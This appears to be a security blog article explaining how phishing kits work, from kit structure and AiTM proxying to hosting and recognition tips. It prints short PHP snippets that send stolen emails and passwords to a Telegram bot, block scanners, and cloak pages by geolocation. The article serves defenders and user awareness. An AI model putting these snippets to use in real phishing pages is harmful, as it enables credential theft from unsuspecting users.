Cyber Threats #phishing kit#credential harvesting#phishing attacks

Inside Phishing Kits: How Attackers Build Credential Harvesting Sites

Understand how phishing kits work—ready-made fake login pages, anti-detection techniques, real-time credential theft, and how to identify phishing pages.

7 min read

Phishing kits are ready-made packages that enable criminals with minimal technical skill to deploy convincing fake websites that steal credentials. They’re available on dark web forums for $20–200 and come with HTML/CSS clones of major login pages, back-end PHP for capturing credentials, obfuscation code to avoid detection, and sometimes real-time alerting. Understanding how phishing kits work helps defenders recognize them and users avoid them.

What a Phishing Kit Contains

A typical phishing kit is a ZIP archive containing:

phishing-kit/
├── index.php          # Main redirect/landing page
├── login.html         # Fake login page (cloned from target)
├── login.php          # Credential capture script
├── redirect.php       # Sends victim to real site after capture
├── .htaccess          # Anti-detection rules
├── resources/
│   ├── style.css      # Cloned CSS
│   ├── logo.png       # Target's logo
│   └── images/        # Cloned assets
└── logs/
    └── credentials.txt # Stolen credential storage

The attacker uploads this kit to a compromised or newly registered website, sends phishing emails directing victims to it, and watches credentials roll in.

How Credential Capture Works

The fake login page looks identical to the real one. When a victim enters their username and password:

  1. login.php captures the submitted credentials
  2. Credentials are written to a log file on the server
  3. Credentials are simultaneously emailed or Telegram-messaged to the attacker in real time
  4. The victim is redirected to the legitimate site with a “Login failed, please try again” message
  5. The victim tries again on the real site — successful login — and assumes they simply mistyped initially

Real-time Telegram notification is common in modern kits:

// From a real phishing kit (simplified)
$message = "New Credential!\nEmail: " . $_POST['email'] . "\nPassword: " . $_POST['password'] . "\nIP: " . $_SERVER['REMOTE_ADDR'];
$telegram_api = "https://api.telegram.org/bot{$bot_token}/sendMessage";
file_get_contents("$telegram_api?chat_id=$chat_id&text=" . urlencode($message));

Adversary-in-the-Middle (AiTM) Phishing Kits

Modern sophisticated kits have evolved beyond simple credential forms. AiTM (Adversary-in-the-Middle) kits proxy the real website through the phishing server:

  1. Victim connects to the phishing server (thinking it’s the real site)
  2. The phishing server proxies the real site — showing the victim’s actual account interface
  3. The victim completes login (including MFA code entry)
  4. The phishing server captures the session cookie in real time
  5. The attacker immediately uses the session cookie to access the account — before MFA becomes irrelevant

EvilGinx and Modlishka are the most well-known legitimate-purpose AiTM frameworks (used in authorized penetration testing). Criminals have built similar tools. AiTM phishing defeats TOTP-based 2FA entirely — only hardware security keys (FIDO2) are fully phishing-resistant.

Anti-Detection Techniques in Phishing Kits

Sophisticated kits include multiple layers of detection evasion:

Blocking Security Researchers and Bots

// .htaccess blocking known scanner IPs and user agents
RewriteCond %{HTTP_USER_AGENT} "bot|crawler|spider|googlebot" [NC]
RewriteRule .* - [F,L]

Many kits maintain lists of security company IP ranges, Tor exit nodes, and VPN providers — blocking these prevents automated phishing page detection.

Cloaking via Geolocation

// Show the phishing page only to targets in specific countries
$ip = $_SERVER['REMOTE_ADDR'];
$location = json_decode(file_get_contents("http://ip-api.com/json/$ip"), true);
if ($location['country'] != 'US') {
    header("Location: https://google.com");
    exit();
}

This shows the real phishing content only to IPs in the targeted country, redirecting security researchers outside that country to an innocent page.

CAPTCHA and JavaScript Requirements

Some kits require JavaScript execution or CAPTCHA completion before showing the phishing page — blocking simple HTTP scanners.

How Phishing Pages Are Hosted

Compromised Legitimate Sites

The most common hosting method is compromising a legitimate website (often running outdated WordPress) and uploading the kit to a subdirectory. The domain has a reputation history and may pass reputation-based filters.

Free Hosting Services

Attackers abuse free hosting platforms — GitHub Pages, Netlify, Firebase Hosting, Google Sites, Cloudflare Pages — for temporary hosting before takedown. These platforms’ domains have high reputation with security filters.

Bulletproof Hosting

Criminal-friendly hosting providers in jurisdictions that don’t cooperate with takedown requests.

Domain Squatting

Registering domains that closely resemble legitimate ones:

  • paypa1.com (letter “l” replaced with “1”)
  • microsoft-account-support.com
  • secure-bankofamerica-login.com
  • Punycode domains: xn--pple-43d.com (looks like “apple.com” in some browsers)

Real-World Phishing Kit Examples

W3LL Panel — a sophisticated phishing-as-a-service platform discovered in 2023. Sold subscriptions to an admin panel with ready-to-deploy Microsoft 365 phishing kits. AiTM capability captured MFA tokens in real time. Targeted 56,000+ Microsoft 365 accounts across 8,000 companies.

EvilProxy — a PhaaS (Phishing as a Service) platform providing reverse-proxy phishing pages for Google, Apple, Facebook, Microsoft, and other major services. Advertised on dark web forums starting in 2022 at $400/month.

Recognizing Phishing Pages

Defensive indicators to look for:

  1. URL doesn’t match the legitimate domain: Check the full URL, not just what’s visible. login.microsoftonline.com.malicious-site.xyz is not Microsoft.
  2. No lock icon / not HTTPS: While HTTPS doesn’t guarantee legitimacy (attackers get free Let’s Encrypt certs), HTTP is always suspicious for login pages.
  3. Unusual subdomain structure: signin.paypal.com is legitimate; paypal-signin.malicious.com is not
  4. Page loaded after an unexpected email: Legitimate services don’t typically email you and immediately ask you to log in
  5. Urgency language: “Your account will be suspended in 24 hours unless you verify”

Defense Against Phishing

FIDO2 hardware security keys are the only 2FA method that’s phishing-resistant. TOTP codes, SMS codes, and push notifications can all be captured by AiTM kits. YubiKey or Google Titan Keys bind authentication cryptographically to the domain — a phishing site gets nothing.

Password managers are a structural defense: they autofill only on the exact registered domain. A password manager will not fill your PayPal credentials on paypa1.com because the domain doesn’t match. This alone catches a large percentage of phishing attempts.

Email security (DMARC/DKIM/SPF) on your domain prevents attackers from spoofing emails from your domain and reduces the effectiveness of business email compromise campaigns.

Understanding phishing kit mechanics helps security teams build better detection rules, train employees more effectively, and evaluate which defensive investments (hardware keys vs. TOTP vs. SMS) provide real protection versus theater.

#anti-phishing #cybercrime #phishing attacks #credential harvesting #phishing kit

// related articles

cyber-threats Botnets Explained: How They Work, Famous Examples, Prevention 7 min read cyber-threats The Dark Web Explained: Tor, Hidden Services, and Cybercrime 7 min read cyber-threats Cloud Account Takeover Attacks: Techniques and Defenses 7 min read